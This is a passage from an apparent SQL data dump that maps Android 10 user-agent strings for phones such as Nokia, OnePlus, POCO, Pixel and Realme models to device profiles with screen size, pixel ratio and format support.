Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 3.4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 4.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":811,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 5.4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 6.1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 6.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 7 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 7.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 7.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 8 Sirocco) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 8.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":855,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Nokia 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Note 8P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":295,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Note 9P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ONEPLUS A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ONEPLUS A5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ONEPLUS A6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ONEPLUS A6003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ONEPLUS A6010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ONEPLUS A6013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; P20HD_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; P40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PCT-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PCT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PH-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":437,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POCO F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POCO F2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POCO M2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POCO M3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POCO X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POCO X3 NFC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POCOPHONE F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POT-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POT-LX1AF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POT-LX1T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POT-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; POT-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; PPA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 2 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 3 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 3a XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":864,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 3a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":808,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 4 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel 4a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Pixel) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Power 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; REVVLRY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1801) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1807) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1921) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1925) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1927) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1971) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1992) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX1993) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2061) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2075) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2086) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2101) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 